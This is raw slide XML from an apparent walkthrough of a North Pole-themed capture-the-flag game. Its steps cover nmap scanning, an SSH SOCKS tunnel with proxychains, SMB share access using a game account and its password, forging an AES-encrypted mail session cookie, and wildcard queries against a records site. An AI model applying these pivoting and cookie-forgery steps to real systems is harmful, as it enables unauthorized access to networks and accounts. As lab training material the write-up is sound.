                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>        Disk      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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IPC$            IPC       Remote IPC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1943100" lvl="2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Reconnecting with SMB1 for workgroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>listing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>FileShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>FileStor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>proxychains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smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> \\\\10.142.0.7\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>FileStor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t> -U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>alabaster_snowball</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>GreatBookPage3.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3 - SMB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28674" name="Picture 2" descr="ase login: sun Dec 17 2017 fræ 10.142.0.11 &#10;[alabaster snowballU2s : &#10;$ map 10.142.0.0/24 &#10;MY Jbx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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="213585" y="3913208"/>
            <a:ext cx="5792045" cy="253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alabaster snowball e 12s &#10;/tmp/ asnow. eFME11pNCA4SM1vSJVoQpYGu &#10;$ nmap 10.142.0.0/24 &#10;St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96"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6238012" y="495300"/>
            <a:ext cx="5850346" cy="595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sh alabaster snowball@35.227.95.239 &#10;The authenticity of host '35.227.95.230 (35.227.95.239)' can't be established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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="100464" y="1099123"/>
            <a:ext cx="5989592" cy="24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07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3 - SMB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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29698" name="Picture 2" descr="roxychains smbclient &#10;-U alabaster snowball &#10;8roxyChains-3.1 (http://proxychains.sf.net) &#10;4'dARNING: The &quot;sys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" y="2153206"/>
            <a:ext cx="1103947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05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4-MAIl cookie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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://mail.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What can you learn from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> page found in an e-mail on that server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Find a NPC conversation with Bumble and SAM. Abominable Snow Monster is throwing snowballs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Rise of the Lollipop Guild </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> Grou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>p of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>spys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> working to undermine Elves</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Pepper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Minstix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> provides some hints for this challenge on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>There's Snow Place Like Home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr"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4-MAIl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie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2313" y="3155538"/>
            <a:ext cx="4299074" cy="2722701"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" fontAlgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="lose &#10;NPC Conversation &#10;Conversation with Bumble and Sam &#10;Arrrrrrr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778001"/>
            <a:ext cx="3930899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) 10.142.0.5/attachments/Great800kPage4_8g3jtg1md2.pdf &#10;e Search &#10;Most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212" y="1125538"/>
            <a:ext cx="4234450" cy="5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5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4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MAIl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cookie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7538"/>
            <a:ext cx="4769194" cy="5047013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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from kali:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -C -D 1080 alabaster_snowball@35.227.95.239</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stream_unhappy_buy_loss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 err="1"/>
              <a:t>nano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proxychains.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>make sure it set to 1080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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 err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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 err="1"/>
              <a:t>mail.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (10.142.0.5)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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.142.0.5/robots.txt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/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://10.142.0.5/cookie.txt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http://10.142.0.5/orders.xhtml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Found correct email from error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on popup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alabaster.snowball@northpolechristmastown.com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Found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err="1" smtClean="0"/>
              <a:t>encrpt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AES256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://aesencryption.net/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1" y="1478570"/>
            <a:ext cx="4769194" cy="5047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ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create AES256 string using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dirty="0" smtClean="0"/>
              <a:t>string: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>thisistheencrypt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key:1234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dirty="0" smtClean="0"/>
              <a:t>AES256: y0MBQ642b8EM5psdSpS03Q==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>final cookie should look like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"y0MBQ642b8EM5psdSpS03Q=="}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>found email with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reatbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> page from holly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>verygreen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://mail.northpolechristmastown.com/attachments/GreatBookPage4_893jt91md2.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shasum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> GreatBookPage4_893jt91md2.pdf </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>f192a884f68af24ae55d9d9ad4adf8d3a3995258 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4-MAIl cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31746" name="Picture 2" descr="ProxyList] &#10;# add proxy here . &#10;# meanwile &#10;# defaults set to &quot;tor&quot; &#10;1080 &#10;sock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3" y="1645133"/>
            <a:ext cx="30956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ocate proxychains .conf &#10;/etc/p roxychains . conf &#10;/va r/lib/dpkg/ info/proxychains . conf files &#10;nano /etc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3" y="3635385"/>
            <a:ext cx="45148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 /tmp/asnow .PgDWQQTcs88c8QRzHhcUE2UK$ nmap 10 . 142 . 0.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3" y="5344998"/>
            <a:ext cx="6021649" cy="124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) 10.142.0.5 &#10;Most Visited v &quot;Offensive Security &#10;Kali Linux &#10;Kali Docs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93" y="1216059"/>
            <a:ext cx="5851662" cy="53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38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4-MAIl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32770" name="Picture 2" descr="0.142.O.5/rob0tstxt &#10;Most Visited v &quot;Offensive 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427" y="77828"/>
            <a:ext cx="3393649" cy="157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) 10.142.O.5/cookietxt &#10;Most Visited v &quot;Offensive Security &#10;q Search &#10;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11" y="1834922"/>
            <a:ext cx="9503400" cy="48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9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777" y="1175658"/>
            <a:ext cx="10529845" cy="55576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1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> using a giant snowball. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the title of that page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b="1" dirty="0"/>
              <a:t>2) Investigate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Letters to Santa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> application at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://l2s.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the topic of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page available in the web root of the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Alabaster Snowball's password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b="1" dirty="0"/>
              <a:t>3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using your access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Letters to Santa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server, identify and enumerate the SMB file-sharing server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the file server share name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b="1" dirty="0"/>
              <a:t>4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://mail.northpolechristmastown.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What can you learn from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>The Great Book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page found in an e-mail on that server?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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4" y="60008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4-MAIl cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33794" name="Picture 2" descr=" Secure https://aesencryption.net &#10;Apps &#10;self a DC Things to DO &#10;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3" y="2182806"/>
            <a:ext cx="5986782" cy="323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dit cookie - Cookies Manager+ &#10;Name: U EWA &#10;Content: &#10;Actions v •Wr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49" y="1745967"/>
            <a:ext cx="5312470" cy="423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9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4-MAIl cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 2" descr=" &#10;Eile Edit Yiew History Bookmarks 1001s &#10;Help &#10;Mozilla Firefox &#10;e Search &#10;Kali Tools •Exploit-DB •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24" y="1425177"/>
            <a:ext cx="6140553" cy="505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) 10.142.O.5/accounthtml &#10;Most Visited v &quot;Offensive Security &#10;Search &#10;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27" y="1478570"/>
            <a:ext cx="5412171" cy="43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5 -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52500"/>
            <a:ext cx="9905999" cy="54720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5) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>4 infractions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>are the names of at least six insider threat moles? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t>Filter data for hair pulling, rock throwing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>wedgy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t> giving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" smtClean="0"/>
              <a:t>Nina, Bini, Sheri, Wesley, Kristy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Boq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0"/>
              <a:t>Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Infractions for rock throwing were Bini and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Boq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4446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5 -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>
            <a:normAutofit lnSpcReduction="10000"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G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nppd.northpolechristmastown.com/infractions?query=name%3A*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/>
              <a:t>Craft request to returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>names (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>status:*)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://json-csv.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to convert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to csv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nalyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the names and compare to document taken from challenge 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>naughty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and nice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>list.csv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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/>
              <a:t>Looked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at BOLO-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MunchkinMoleReport.docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> taken from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server and see that all moles were charged with 'aggravated hair pulling' and search for term 'hair pulling' in list of names taken from NPPD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5 -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/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35842" name="Picture 2" descr=" Secure https://nppd.northpolechristmastown.com/infractions?query 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0" y="1210794"/>
